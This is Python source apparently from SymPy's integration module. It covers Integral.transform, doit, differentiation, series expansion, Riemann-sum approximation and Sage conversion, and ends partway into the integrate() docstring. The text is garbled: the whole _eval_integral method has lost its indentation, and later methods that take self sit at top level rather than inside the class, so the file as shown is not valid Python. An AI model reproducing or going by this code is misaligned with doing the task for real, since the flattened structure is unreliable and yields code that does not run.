        The mappings, F(x) or f(u), must lead to a unique integral. Linear
        or rational linear expression, `2*x`, `1/x` and `sqrt(x)`, will
        always work; quadratic expressions like `x**2 - 1` are acceptable
        as long as the resulting integrand does not depend on the sign of
        the solutions (see examples).

        The integral will be returned unchanged if `x` is not a variable of
        integration.

        `x` must be (or contain) only one of of the integration variables. If
        `u` has more than one free symbol then it should be sent as a tuple
        (`u`, `uvar`) where `uvar` identifies which variable is replacing
        the integration variable.
        XXX can it contain another integration variable?

        Examples
        ========

        >>> from sympy.abc import a, b, c, d, x, u, y
        >>> from sympy import Integral, S, cos, sqrt

        >>> i = Integral(x*cos(x**2 - 1), (x, 0, 1))

        transform can change the variable of integration

        >>> i.transform(x, u)
        Integral(u*cos(u**2 - 1), (u, 0, 1))

        transform can perform u-substitution as long as a unique
        integrand is obtained:

        >>> i.transform(x**2 - 1, u)
        Integral(cos(u)/2, (u, -1, 0))

        This attempt fails because x = +/-sqrt(u + 1) and the
        sign does not cancel out of the integrand:

        >>> Integral(cos(x**2 - 1), (x, 0, 1)).transform(x**2 - 1, u)
        Traceback (most recent call last):
        ...
        ValueError:
        The mapping between F(x) and f(u) did not give a unique integrand.

        transform can do a substitution. Here, the previous
        result is transformed back into the original expression
        using "u-substitution":

        >>> ui = _
        >>> _.transform(sqrt(u + 1), x) == i
        True

        We can accomplish the same with a regular substitution:

        >>> ui.transform(u, x**2 - 1) == i
        True

        If the `x` does not contain a symbol of integration then
        the integral will be returned unchanged. Integral `i` does
        not have an integration variable `a` so no change is made:

        >>> i.transform(a, x) == i
        True

        When `u` has more than one free symbol the symbol that is
        replacing `x` must be identified by passing `u` as a tuple:

        >>> Integral(x, (x, 0, 1)).transform(x, (u + a, u))
        Integral(a + u, (u, -a, -a + 1))
        >>> Integral(x, (x, 0, 1)).transform(x, (u + a, a))
        Integral(a + u, (a, -u, -u + 1))

        See Also
        ========

        variables : Lists the integration variables
        as_dummy : Replace integration variables with dummy ones
        """
        from sympy.solvers.solvers import solve, posify
        d = Dummy('d')

        # identify which integration variable x targets (at most one)
        xfree = x.free_symbols.intersection(self.variables)
        if len(xfree) > 1:
            raise ValueError(
                'F(x) can only contain one of: %s' % self.variables)
        xvar = xfree.pop() if xfree else d
        if xvar not in self.variables:
            # x does not involve a variable of integration: nothing to do
            return self

        # identify uvar, the symbol that will replace the integration variable
        u = sympify(u)
        if isinstance(u, Expr):
            ufree = u.free_symbols
            if len(ufree) != 1:
                raise ValueError(filldedent('''
                When f(u) has more than one free symbol, the one replacing x
                must be identified: pass f(u) as (f(u), u)'''))
            uvar = ufree.pop()
        else:
            u, uvar = u
            if uvar not in u.free_symbols:
                raise ValueError(filldedent('''
                Expecting a tuple (expr, symbol) where symbol identified
                a free symbol in expr, but symbol is not in expr's free
                symbols.'''))
            if not isinstance(uvar, Symbol):
                raise ValueError(filldedent('''
                Expecting a tuple (expr, symbol) but didn't get
                a symbol; got %s''' % uvar))

        if x.is_Symbol and u.is_Symbol:
            # trivial rename of the integration variable
            return self.xreplace({x: u})

        if not x.is_Symbol and not u.is_Symbol:
            raise ValueError('either x or u must be a symbol')

        if uvar == xvar:
            # avoid a name clash by transforming through an intermediate dummy
            return self.transform(x, (u.subs(uvar, d), d)).xreplace({d: uvar})

        if uvar in self.limits:
            raise ValueError(filldedent('''
            u must contain the same variable as in x
            or a variable that is not already an integration variable'''))

        # build f (substitution) and F (inverse) as lists of candidates in d
        if not x.is_Symbol:
            F = [x.subs(xvar, d)]
            soln = solve(u - x, xvar, check=False)
            if not soln:
                raise ValueError('no solution for solve(F(x) - f(u), x)')
            f = [fi.subs(uvar, d) for fi in soln]
        else:
            f = [u.subs(uvar, d)]
            # posify helps solve() pick consistent branches for the inverse
            pdiff, reps = posify(u - x)
            puvar = uvar.subs([(v, k) for k, v in reps.items()])
            soln = [s.subs(reps) for s in solve(pdiff, puvar)]
            if not soln:
                raise ValueError('no solution for solve(F(x) - f(u), u)')
            F = [fi.subs(xvar, d) for fi in soln]

        # all candidate substitutions must yield the same new integrand
        newfuncs = set([(self.function.subs(xvar, fi)*fi.diff(d)
                        ).subs(d, uvar) for fi in f])
        if len(newfuncs) > 1:
            raise ValueError(filldedent('''
            The mapping between F(x) and f(u) did not give
            a unique integrand.'''))
        newfunc = newfuncs.pop()

        def _calc_limit_1(F, a, b):
            """
            replace d with a, using subs if possible, otherwise limit
            where sign of b is considered
            """
            wok = F.subs(d, a)
            if wok is S.NaN or wok.is_finite is False and a.is_finite:
                return limit(sign(b)*F, d, a)
            return wok

        def _calc_limit(a, b):
            """
            replace d with a, using subs if possible, otherwise limit
            where sign of b is considered
            """
            avals = list({_calc_limit_1(Fi, a, b) for Fi in F})
            if len(avals) > 1:
                raise ValueError(filldedent('''
                The mapping between F(x) and f(u) did not
                give a unique limit.'''))
            return avals[0]

        # rewrite each limit that targets xvar in terms of uvar
        newlimits = []
        for xab in self.limits:
            sym = xab[0]
            if sym == xvar:
                if len(xab) == 3:
                    a, b = xab[1:]
                    a, b = _calc_limit(a, b), _calc_limit(b, a)
                    if a - b > 0:
                        # keep limits ordered; flipping them negates the
                        # integrand to preserve the value
                        a, b = b, a
                        newfunc = -newfunc
                    newlimits.append((uvar, a, b))
                elif len(xab) == 2:
                    a = _calc_limit(xab[1], 1)
                    newlimits.append((uvar, a))
                else:
                    newlimits.append(uvar)
            else:
                newlimits.append(xab)

        return self.func(newfunc, *newlimits)
    def doit(self, **hints):
        """
        Perform the integration using any hints given.

        Recognized hints include ``deep`` (evaluate the integrand first),
        ``meijerg``, ``risch`` and ``manual`` (select an integration
        strategy; at most one may be True) and ``conds`` (how convergence
        conditions are reported: 'piecewise', 'separate' or 'none').

        Examples
        ========

        >>> from sympy import Integral
        >>> from sympy.abc import x, i
        >>> Integral(x**i, (i, 1, 3)).doit()
        Piecewise((x**3/log(x) - x/log(x),
            (x > 1) | ((x >= 0) & (x < 1))), (2, True))

        See Also
        ========

        sympy.integrals.trigonometry.trigintegrate
        sympy.integrals.risch.heurisch
        sympy.integrals.rationaltools.ratint
        as_sum : Approximate the integral using a sum
        """
        if not hints.get('integrals', True):
            return self

        deep = hints.get('deep', True)
        meijerg = hints.get('meijerg', None)
        conds = hints.get('conds', 'piecewise')
        risch = hints.get('risch', None)
        manual = hints.get('manual', None)
        # the three strategy flags are mutually exclusive
        if len(list(filter(None, (manual, meijerg, risch)))) > 1:
            raise ValueError("At most one of manual, meijerg, risch can be True")
        elif manual:
            meijerg = risch = False
        elif meijerg:
            manual = risch = False
        elif risch:
            manual = meijerg = False
        eval_kwargs = dict(meijerg=meijerg, risch=risch, manual=manual,
            conds=conds)

        if conds not in ['separate', 'piecewise', 'none']:
            raise ValueError('conds must be one of "separate", "piecewise", '
                             '"none", got: %s' % conds)

        if risch and any(len(xab) > 1 for xab in self.limits):
            raise ValueError('risch=True is only allowed for indefinite integrals.')

        # check for the trivial zero
        if self.is_zero:
            return S.Zero

        # now compute and check the function
        function = self.function
        if deep:
            function = function.doit(**hints)
        if function.is_zero:
            return S.Zero

        # hacks to handle special cases
        if isinstance(function, MatrixBase):
            # integrate a matrix entry-wise
            return function.applyfunc(
                lambda f: self.func(f, self.limits).doit(**hints))

        if isinstance(function, FormalPowerSeries):
            if len(self.limits) > 1:
                raise NotImplementedError
            xab = self.limits[0]
            if len(xab) > 1:
                return function.integrate(xab, **eval_kwargs)
            else:
                return function.integrate(xab[0], **eval_kwargs)

        # There is no trivial answer and special handling
        # is done so continue

        # integrate one limit at a time, innermost first; limits that
        # cannot be done yet are collected in undone_limits
        undone_limits = []
        # ulj = free symbols of any undone limits' upper and lower limits
        ulj = set()
        for xab in self.limits:
            # compute uli, the free symbols in the
            # Upper and Lower limits of limit I
            if len(xab) == 1:
                uli = set(xab[:1])
            elif len(xab) == 2:
                uli = xab[1].free_symbols
            elif len(xab) == 3:
                uli = xab[1].free_symbols.union(xab[2].free_symbols)
            # this integral can be done as long as there is no blocking
            # limit that has been undone. An undone limit is blocking if
            # it contains an integration variable that is in this limit's
            # upper or lower free symbols or vice versa
            if xab[0] in ulj or any(v[0] in uli for v in undone_limits):
                undone_limits.append(xab)
                ulj.update(uli)
                function = self.func(*([function] + [xab]))
                factored_function = function.factor()
                if not isinstance(factored_function, Integral):
                    function = factored_function
                continue

            if function.has(Abs, sign) and (
                (len(xab) < 3 and all(x.is_real for x in xab)) or
                (len(xab) == 3 and all(x.is_real and x.is_finite for
                 x in xab[1:]))):
                    # some improper integrals are better off with Abs
                    xr = Dummy("xr", real=True)
                    function = (function.xreplace({xab[0]: xr})
                        .rewrite(Piecewise).xreplace({xr: xab[0]}))
            elif function.has(Min, Max):
                function = function.rewrite(Piecewise)
            if (function.has(Piecewise) and
                    not isinstance(function, Piecewise)):
                function = piecewise_fold(function)
            if isinstance(function, Piecewise):
                if len(xab) == 1:
                    antideriv = function._eval_integral(xab[0],
                        **eval_kwargs)
                else:
                    antideriv = self._eval_integral(
                        function, xab[0], **eval_kwargs)
            else:
                # There are a number of tradeoffs in using the
                # Meijer G method. It can sometimes be a lot faster
                # than other methods, and sometimes slower. And
                # there are certain types of integrals for which it
                # is more likely to work than others. These
                # heuristics are incorporated in deciding what
                # integration methods to try, in what order. See the
                # integrate() docstring for details.
                def try_meijerg(function, xab):
                    # attempt a definite integral via Meijer G-functions;
                    # returns None when not applicable or unsuccessful
                    ret = None
                    if len(xab) == 3 and meijerg is not False:
                        x, a, b = xab
                        try:
                            res = meijerint_definite(function, x, a, b)
                        except NotImplementedError:
                            from sympy.integrals.meijerint import _debug
                            _debug('NotImplementedError '
                                'from meijerint_definite')
                            res = None
                        if res is not None:
                            f, cond = res
                            if conds == 'piecewise':
                                ret = Piecewise(
                                    (f, cond),
                                    (self.func(
                                    function, (x, a, b)), True))
                            elif conds == 'separate':
                                if len(self.limits) != 1:
                                    raise ValueError(filldedent('''
                                        conds=separate not supported in
                                        multiple integrals'''))
                                ret = f, cond
                            else:
                                ret = f
                    return ret

                meijerg1 = meijerg
                if (meijerg is not False and
                        len(xab) == 3 and xab[1].is_real and xab[2].is_real
                        and not function.is_Poly and
                        (xab[1].has(oo, -oo) or xab[2].has(oo, -oo))):
                    ret = try_meijerg(function, xab)
                    if ret is not None:
                        function = ret
                        continue
                    meijerg1 = False
                # If the special meijerg code did not succeed in
                # finding a definite integral, then the code using
                # meijerint_indefinite will not either (it might
                # find an antiderivative, but the answer is likely
                # to be nonsensical). Thus if we are requested to
                # only use Meijer G-function methods, we give up at
                # this stage. Otherwise we just disable G-function
                # methods.
                if meijerg1 is False and meijerg is True:
                    antideriv = None
                else:
                    antideriv = self._eval_integral(
                        function, xab[0], **eval_kwargs)
                    if antideriv is None and meijerg is True:
                        ret = try_meijerg(function, xab)
                        if ret is not None:
                            function = ret
                            continue

            if not isinstance(antideriv, Integral) and antideriv is not None:
                # correct branch-cut jumps in atan of linear combinations of
                # tan/cot so the antiderivative is continuous across periods
                sym = xab[0]
                for atan_term in antideriv.atoms(atan):
                    atan_arg = atan_term.args[0]
                    # Checking `atan_arg` to be linear combination of `tan` or `cot`
                    for tan_part in atan_arg.atoms(tan):
                        x1 = Dummy('x1')
                        tan_exp1 = atan_arg.subs(tan_part, x1)
                        # The coefficient of `tan` should be constant
                        coeff = tan_exp1.diff(x1)
                        if x1 not in coeff.free_symbols:
                            a = tan_part.args[0]
                            antideriv = antideriv.subs(atan_term, Add(atan_term,
                                sign(coeff)*pi*floor((a-pi/2)/pi)))
                    for cot_part in atan_arg.atoms(cot):
                        x1 = Dummy('x1')
                        cot_exp1 = atan_arg.subs(cot_part, x1)
                        # The coefficient of `cot` should be constant
                        coeff = cot_exp1.diff(x1)
                        if x1 not in coeff.free_symbols:
                            a = cot_part.args[0]
                            antideriv = antideriv.subs(atan_term, Add(atan_term,
                                sign(coeff)*pi*floor((a)/pi)))

            if antideriv is None:
                undone_limits.append(xab)
                function = self.func(*([function] + [xab])).factor()
                factored_function = function.factor()
                if not isinstance(factored_function, Integral):
                    function = factored_function
                continue
            else:
                if len(xab) == 1:
                    function = antideriv
                else:
                    if len(xab) == 3:
                        x, a, b = xab
                    elif len(xab) == 2:
                        x, b = xab
                        a = None
                    else:
                        raise NotImplementedError

                    if deep:
                        if isinstance(a, Basic):
                            a = a.doit(**hints)
                        if isinstance(b, Basic):
                            b = b.doit(**hints)

                    if antideriv.is_Poly:
                        gens = list(antideriv.gens)
                        gens.remove(x)

                        antideriv = antideriv.as_expr()

                        function = antideriv._eval_interval(x, a, b)
                        function = Poly(function, *gens)
                    else:
                        def is_indef_int(g, x):
                            return (isinstance(g, Integral) and
                                    any(i == (x,) for i in g.limits))

                        def eval_factored(f, x, a, b):
                            # _eval_interval for integrals with
                            # (constant) factors
                            # a single indefinite integral is assumed
                            args = []
                            for g in Mul.make_args(f):
                                if is_indef_int(g, x):
                                    args.append(g._eval_interval(x, a, b))
                                else:
                                    args.append(g)
                            return Mul(*args)

                        integrals, others = [], []
                        for f in Add.make_args(antideriv):
                            if any(is_indef_int(g, x)
                                   for g in Mul.make_args(f)):
                                integrals.append(f)
                            else:
                                others.append(f)
                        uneval = Add(*[eval_factored(f, x, a, b)
                                       for f in integrals])
                        try:
                            evalued = Add(*others)._eval_interval(x, a, b)
                            function = uneval + evalued
                        except NotImplementedError:
                            # This can happen if _eval_interval depends in a
                            # complicated way on limits that cannot be computed
                            undone_limits.append(xab)
                            function = self.func(*([function] + [xab]))
                            factored_function = function.factor()
                            if not isinstance(factored_function, Integral):
                                function = factored_function

        return function
    def _eval_derivative(self, sym):
        """Evaluate the derivative of the current Integral object by
        differentiating under the integral sign [1], using the Fundamental
        Theorem of Calculus [2] when possible.

        Whenever an Integral is encountered that is equivalent to zero or
        has an integrand that is independent of the variable of integration
        those integrals are performed. All others are returned as Integral
        instances which can be resolved with doit() (provided they are integrable).

        References:
           [1] http://en.wikipedia.org/wiki/Differentiation_under_the_integral_sign
           [2] http://en.wikipedia.org/wiki/Fundamental_theorem_of_calculus

        Examples
        ========

        >>> from sympy import Integral
        >>> from sympy.abc import x, y
        >>> i = Integral(x + y, y, (y, 1, x))
        >>> i.diff(x)
        Integral(x + y, (y, x)) + Integral(1, y, (y, 1, x))
        >>> i.doit().diff(x) == i.diff(x).doit()
        True
        >>> i.diff(y)
        0

        The previous must be true since there is no y in the evaluated integral:

        >>> i.free_symbols
        {x}
        >>> i.doit()
        2*x**3/3 - x/2 - 1/6
        """

        # differentiate under the integral sign; we do not
        # check for regularity conditions (TODO), see issue 4215

        # get limits and the function
        f, limits = self.function, list(self.limits)

        # the order matters if variables of integration appear in the limits
        # so work our way in from the outside to the inside.
        limit = limits.pop(-1)
        # unpack the outermost limit: (x, a, b), (x, b) or bare x
        if len(limit) == 3:
            x, a, b = limit
        elif len(limit) == 2:
            x, b = limit
            a = None
        else:
            a = b = None
            x = limit[0]

        if limits:  # f is the argument to an integral
            f = self.func(f, *tuple(limits))

        # assemble the pieces
        def _do(f, ab):
            # contribution of endpoint `ab` by the Fundamental Theorem of
            # Calculus: f evaluated at the endpoint times d(ab)/d(sym)
            dab_dsym = diff(ab, sym)
            if not dab_dsym:
                return S.Zero
            if isinstance(f, Integral):
                limits = [(x, x) if (len(l) == 1 and l[0] == x) else l
                          for l in f.limits]
                f = self.func(f.function, *limits)
            return f.subs(x, ab)*dab_dsym

        rv = 0
        if b is not None:
            rv += _do(f, b)
        if a is not None:
            rv -= _do(f, a)
        if len(limit) == 1 and sym == x:
            # the dummy variable *is* also the real-world variable
            arg = f
            rv += arg
        else:
            # the dummy variable might match sym but it's
            # only a dummy and the actual variable is determined
            # by the limits, so mask off the variable of integration
            # while differentiating
            u = Dummy('u')
            arg = f.subs(x, u).diff(sym).subs(u, x)
            rv += self.func(arg, Tuple(x, a, b))
        return rv
def _eval_integral(self, f, x, meijerg=None, risch=None, manual=None,
conds='piecewise'):
"""
Calculate the anti-derivative to the function f(x).
The following algorithms are applied (roughly in this order):
1. Simple heuristics (based on pattern matching and integral table):
- most frequently used functions (e.g. polynomials, products of
trig functions)
2. Integration of rational functions:
- A complete algorithm for integrating rational functions is
implemented (the Lazard-Rioboo-Trager algorithm). The algorithm
also uses the partial fraction decomposition algorithm
implemented in apart() as a preprocessor to make this process
faster. Note that the integral of a rational function is always
elementary, but in general, it may include a RootSum.
3. Full Risch algorithm:
- The Risch algorithm is a complete decision
procedure for integrating elementary functions, which means that
given any elementary function, it will either compute an
elementary antiderivative, or else prove that none exists.
Currently, part of transcendental case is implemented, meaning
elementary integrals containing exponentials, logarithms, and
(soon!) trigonometric functions can be computed. The algebraic
case, e.g., functions containing roots, is much more difficult
and is not implemented yet.
- If the routine fails (because the integrand is not elementary, or
because a case is not implemented yet), it continues on to the
next algorithms below. If the routine proves that the integrals
is nonelementary, it still moves on to the algorithms below,
because we might be able to find a closed-form solution in terms
of special functions. If risch=True, however, it will stop here.
4. The Meijer G-Function algorithm:
- This algorithm works by first rewriting the integrand in terms of
very general Meijer G-Function (meijerg in SymPy), integrating
it, and then rewriting the result back, if possible. This
algorithm is particularly powerful for definite integrals (which
is actually part of a different method of Integral), since it can
compute closed-form solutions of definite integrals even when no
closed-form indefinite integral exists. But it also is capable
of computing many indefinite integrals as well.
- Another advantage of this method is that it can use some results
about the Meijer G-Function to give a result in terms of a
Piecewise expression, which allows to express conditionally
convergent integrals.
- Setting meijerg=True will cause integrate() to use only this
method.
5. The "manual integration" algorithm:
- This algorithm tries to mimic how a person would find an
antiderivative by hand, for example by looking for a
substitution or applying integration by parts. This algorithm
does not handle as many integrands but can return results in a
more familiar form.
- Sometimes this algorithm can evaluate parts of an integral; in
this case integrate() will try to evaluate the rest of the
integrand using the other methods here.
- Setting manual=True will cause integrate() to use only this
method.
6. The Heuristic Risch algorithm:
- This is a heuristic version of the Risch algorithm, meaning that
it is not deterministic. This is tried as a last resort because
it can be very slow. It is still used because not enough of the
full Risch algorithm is implemented, so that there are still some
integrals that can only be computed using this method. The goal
is to implement enough of the Risch and Meijer G-function methods
so that this can be deleted.
"""
from sympy.integrals.deltafunctions import deltaintegrate
from sympy.integrals.singularityfunctions import singularityintegrate
from sympy.integrals.heurisch import heurisch, heurisch_wrapper
from sympy.integrals.rationaltools import ratint
from sympy.integrals.risch import risch_integrate
if risch:
try:
return risch_integrate(f, x, conds=conds)
except NotImplementedError:
return None
if manual:
try:
result = manualintegrate(f, x)
if result is not None and result.func != Integral:
return result
except (ValueError, PolynomialError):
pass
eval_kwargs = dict(meijerg=meijerg, risch=risch, manual=manual,
conds=conds)
# if it is a poly(x) then let the polynomial integrate itself (fast)
#
# It is important to make this check first, otherwise the other code
# will return a sympy expression instead of a Polynomial.
#
# see Polynomial for details.
if isinstance(f, Poly) and not (manual or meijerg or risch):
return f.integrate(x)
# Piecewise antiderivatives need to call special integrate.
if isinstance(f, Piecewise):
return f.piecewise_integrate(x, **eval_kwargs)
# let's cut it short if `f` does not depend on `x`; if
# x is only a dummy, that will be handled below
if not f.has(x):
return f*x
# try to convert to poly(x) and then integrate if successful (fast)
poly = f.as_poly(x)
if poly is not None and not (manual or meijerg or risch):
return poly.integrate().as_expr()
if risch is not False:
try:
result, i = risch_integrate(f, x, separate_integral=True,
conds=conds)
except NotImplementedError:
pass
else:
if i:
# There was a nonelementary integral. Try integrating it.
# if no part of the NonElementaryIntegral is integrated by
# the Risch algorithm, then use the original function to
# integrate, instead of re-written one
if result == 0:
from sympy.integrals.risch import NonElementaryIntegral
return NonElementaryIntegral(f, x).doit(risch=False)
else:
return result + i.doit(risch=False)
else:
return result
# since Integral(f=g1+g2+...) == Integral(g1) + Integral(g2) + ...
# we are going to handle Add terms separately,
# if `f` is not Add -- we only have one term
# Note that in general, this is a bad idea, because Integral(g1) +
# Integral(g2) might not be computable, even if Integral(g1 + g2) is.
# For example, Integral(x**x + x**x*log(x)). But many heuristics only
# work term-wise. So we compute this step last, after trying
# risch_integrate. We also try risch_integrate again in this loop,
# because maybe the integral is a sum of an elementary part and a
# nonelementary part (like erf(x) + exp(x)). risch_integrate() is
# quite fast, so this is acceptable.
parts = []
args = Add.make_args(f)
for g in args:
coeff, g = g.as_independent(x)
# g(x) = const
if g is S.One and not meijerg:
parts.append(coeff*x)
continue
# g(x) = expr + O(x**n)
order_term = g.getO()
if order_term is not None:
h = self._eval_integral(g.removeO(), x, **eval_kwargs)
if h is not None:
h_order_expr = self._eval_integral(order_term.expr, x, **eval_kwargs)
if h_order_expr is not None:
h_order_term = order_term.func(
h_order_expr, *order_term.variables)
parts.append(coeff*(h + h_order_term))
continue
# NOTE: if there is O(x**n) and we fail to integrate then
# there is no point in trying other methods because they
# will fail, too.
return None
# c
# g(x) = (a*x+b)
if g.is_Pow and not g.exp.has(x) and not meijerg:
a = Wild('a', exclude=[x])
b = Wild('b', exclude=[x])
M = g.base.match(a*x + b)
if M is not None:
if g.exp == -1:
h = log(g.base)
elif conds != 'piecewise':
h = g.base**(g.exp + 1) / (g.exp + 1)
else:
h1 = log(g.base)
h2 = g.base**(g.exp + 1) / (g.exp + 1)
h = Piecewise((h2, Ne(g.exp, -1)), (h1, True))
parts.append(coeff * h / M[a])
continue
# poly(x)
# g(x) = -------
# poly(x)
if g.is_rational_function(x) and not (manual or meijerg or risch):
parts.append(coeff * ratint(g, x))
continue
if not (manual or meijerg or risch):
# g(x) = Mul(trig)
h = trigintegrate(g, x, conds=conds)
if h is not None:
parts.append(coeff * h)
continue
# g(x) has at least a DiracDelta term
h = deltaintegrate(g, x)
if h is not None:
parts.append(coeff * h)
continue
# g(x) has at least a Singularity Function term
h = singularityintegrate(g, x)
if h is not None:
parts.append(coeff * h)
continue
# Try risch again.
if risch is not False:
try:
h, i = risch_integrate(g, x,
separate_integral=True, conds=conds)
except NotImplementedError:
h = None
else:
if i:
h = h + i.doit(risch=False)
parts.append(coeff*h)
continue
# fall back to heurisch
try:
if conds == 'piecewise':
h = heurisch_wrapper(g, x, hints=[])
else:
h = heurisch(g, x, hints=[])
except PolynomialError:
# XXX: this exception means there is a bug in the
# implementation of heuristic Risch integration
# algorithm.
h = None
else:
h = None
if meijerg is not False and h is None:
# rewrite using G functions
try:
h = meijerint_indefinite(g, x)
except NotImplementedError:
from sympy.integrals.meijerint import _debug
_debug('NotImplementedError from meijerint_definite')
res = None
if h is not None:
parts.append(coeff * h)
continue
if h is None and manual is not False:
try:
result = manualintegrate(g, x)
if result is not None and not isinstance(result, Integral):
if result.has(Integral) and not manual:
# Try to have other algorithms do the integrals
# manualintegrate can't handle,
# unless we were asked to use manual only.
# Keep the rest of eval_kwargs in case another
# method was set to False already
new_eval_kwargs = eval_kwargs
new_eval_kwargs["manual"] = False
result = result.func(*[
arg.doit(**new_eval_kwargs) if
arg.has(Integral) else arg
for arg in result.args
]).expand(multinomial=False,
log=False,
power_exp=False,
power_base=False)
if not result.has(Integral):
parts.append(coeff * result)
continue
except (ValueError, PolynomialError):
# can't handle some SymPy expressions
pass
# if we failed maybe it was because we had
# a product that could have been expanded,
# so let's try an expansion of the whole
# thing before giving up; we don't try this
# at the outset because there are things
# that cannot be solved unless they are
# NOT expanded e.g., x**x*(1+log(x)). There
# should probably be a checker somewhere in this
# routine to look for such cases and try to do
# collection on the expressions if they are already
# in an expanded form
if not h and len(args) == 1:
f = sincos_to_sum(f).expand(mul=True, deep=False)
if f.is_Add:
# Note: risch will be identical on the expanded
# expression, but maybe it will be able to pick out parts,
# like x*(exp(x) + erf(x)).
return self._eval_integral(f, x, **eval_kwargs)
if h is not None:
parts.append(coeff * h)
else:
return None
return Add(*parts)
def _eval_lseries(self, x, logx):
    """Yield the integral of each term of the integrand's lseries.

    When ``x`` appears in the bounds of one of the limits, the series
    is expanded in the corresponding dummy integration variable
    instead of in ``x`` itself.
    """
    dummified = self.as_dummy()
    series_var = x
    for limit in dummified.limits:
        if x in limit[1:]:
            series_var = limit[0]
            break
    for term in dummified.function.lseries(series_var, logx):
        yield integrate(term, *dummified.limits)
def _eval_nseries(self, x, n, logx):
    """Return the nseries of the integral: integrate the truncated
    series of the integrand and re-attach the order terms.
    """
    dummified = self.as_dummy()
    # Expand in the dummy variable of the first limit whose bounds
    # mention x; otherwise expand in x itself.
    series_var = next(
        (limit[0] for limit in dummified.limits if x in limit[1:]), x)
    terms, order = dummified.function.nseries(
        x=series_var, n=n, logx=logx).as_coeff_add(Order)
    # Express the order terms back in the original variable; they are
    # then multiplied by x — presumably to account for the power of x
    # picked up by integrating (NOTE(review): confirm).
    order = [o.subs(series_var, x) for o in order]
    return integrate(terms, *dummified.limits) + Add(*order)*x
def _eval_as_leading_term(self, x):
    """Integrate the first nonzero term of the integrand's lseries."""
    for leading_term in self.args[0].lseries(x):
        if leading_term != 0:
            break
    # args[1:] are the integration limits of this Integral.
    return integrate(leading_term, *self.args[1:])
def as_sum(self, n=None, method="midpoint", evaluate=True):
    """
    Approximates a definite integral by a sum.

    Arguments
    ---------
    n
        The number of subintervals to use, optional.
    method
        One of: 'left', 'right', 'midpoint', 'trapezoid'.
    evaluate
        If False, returns an unevaluated Sum expression. The default
        is True, evaluate the sum.

    These methods of approximate integration are described in [1].

    [1] https://en.wikipedia.org/wiki/Riemann_sum#Methods

    Examples
    ========

    >>> from sympy import sin, sqrt
    >>> from sympy.abc import x, n
    >>> from sympy.integrals import Integral
    >>> e = Integral(sin(x), (x, 3, 7))
    >>> e
    Integral(sin(x), (x, 3, 7))

    For demonstration purposes, this interval will only be split into 2
    regions, bounded by [3, 5] and [5, 7].

    The left-hand rule uses function evaluations at the left of each
    interval:

    >>> e.as_sum(2, 'left')
    2*sin(5) + 2*sin(3)

    The midpoint rule uses evaluations at the center of each interval:

    >>> e.as_sum(2, 'midpoint')
    2*sin(4) + 2*sin(6)

    The right-hand rule uses function evaluations at the right of each
    interval:

    >>> e.as_sum(2, 'right')
    2*sin(5) + 2*sin(7)

    The trapezoid rule uses function evaluations on both sides of the
    intervals. This is equivalent to taking the average of the left and
    right hand rule results:

    >>> e.as_sum(2, 'trapezoid')
    2*sin(5) + sin(3) + sin(7)
    >>> (e.as_sum(2, 'left') + e.as_sum(2, 'right'))/2 == _
    True

    Here, the discontinuity at x = 0 can be avoided by using the
    midpoint or right-hand method:

    >>> e = Integral(1/sqrt(x), (x, 0, 1))
    >>> e.as_sum(5).n(4)
    1.730
    >>> e.as_sum(10).n(4)
    1.809
    >>> e.doit().n(4)  # the actual value is 2
    2.000

    The left- or trapezoid method will encounter the discontinuity and
    return infinity:

    >>> e.as_sum(5, 'left')
    zoo

    The number of intervals can be symbolic. If omitted, a dummy symbol
    will be used for it.

    >>> e = Integral(x**2, (x, 0, 2))
    >>> e.as_sum(n, 'right').expand()
    8/3 + 4/n + 4/(3*n**2)

    This shows that the midpoint rule is more accurate, as its error
    term decays as the square of n:

    >>> e.as_sum(method='midpoint').expand()
    8/3 - 2/(3*_n**2)

    A symbolic sum is returned with evaluate=False:

    >>> e.as_sum(n, 'midpoint', evaluate=False)
    2*Sum((2*_k/n - 1/n)**2, (_k, 1, n))/n

    See Also
    ========

    Integral.doit : Perform the integration using any hints
    """
    from sympy.concrete.summations import Sum

    # Only a single integral over a finite (x, a, b) interval can be
    # approximated by a Riemann sum here.
    limits = self.limits
    if len(limits) > 1:
        raise NotImplementedError(
            "Multidimensional midpoint rule not implemented yet")
    else:
        limit = limits[0]
        if (len(limit) != 3 or limit[1].is_finite is False or
                limit[2].is_finite is False):
            raise ValueError("Expecting a definite integral over "
                             "a finite interval.")

    # A symbolic subinterval count gets a fresh positive-integer Dummy,
    # which keeps the Sum below symbolic.
    if n is None:
        n = Dummy('n', integer=True, positive=True)
    else:
        n = sympify(n)
    if (n.is_positive is False or n.is_integer is False or
            n.is_finite is False):
        raise ValueError("n must be a positive integer, got %s" % n)

    x, a, b = limit
    dx = (b - a)/n
    k = Dummy('k', integer=True, positive=True)
    f = self.function

    # Evaluation point per subinterval k: left endpoint a+(k-1)*dx,
    # right endpoint a+k*dx, midpoint a+k*dx-dx/2; the trapezoid rule
    # averages the outer endpoints and sums the interior right points.
    if method == "left":
        result = dx*Sum(f.subs(x, a + (k-1)*dx), (k, 1, n))
    elif method == "right":
        result = dx*Sum(f.subs(x, a + k*dx), (k, 1, n))
    elif method == "midpoint":
        result = dx*Sum(f.subs(x, a + k*dx - dx/2), (k, 1, n))
    elif method == "trapezoid":
        result = dx*((f.subs(x, a) + f.subs(x, b))/2 +
                     Sum(f.subs(x, a + k*dx), (k, 1, n - 1)))
    else:
        raise ValueError("Unknown method %s" % method)
    return result.doit() if evaluate else result
def _sage_(self):
    """Convert this Integral to a held Sage symbolic integral."""
    import sage.all as sage

    result = self.function._sage_()
    for limit in self.limits:
        if len(limit) == 1:
            # Indefinite integral in the given variable.
            (var,) = limit
            result = sage.integral(result, var._sage_(), hold=True)
        elif len(limit) == 2:
            # (symbol, a): the second element is passed through as a
            # bare positional argument, mirroring the SymPy convention.
            var, second = limit
            result = sage.integral(result,
                                   var._sage_(),
                                   second._sage_(),
                                   hold=True)
        else:
            # (symbol, a, b): definite integral over [a, b].
            var, lower, upper = limit
            result = sage.integral(result,
                                   (var._sage_(),
                                    lower._sage_(),
                                    upper._sage_()),
                                   hold=True)
    return result
def integrate(*args, **kwargs):
    """integrate(f, var, ...)

    Compute definite or indefinite integral of one or more variables
    using Risch-Norman algorithm and table lookup. This procedure is
    able to handle elementary algebraic and transcendental functions
    and also a huge class of special functions, including Airy,
    Bessel, Whittaker and Lambert.

    var can be:

    - a symbol -- indefinite integration
    - a tuple (symbol, a) -- indefinite integration with result
      given with `a` replacing `symbol`
    - a tuple (symbol, a, b) -- definite integration

    Several variables can be specified, in which case the result is
    multiple integration. (If var is omitted and the integrand is
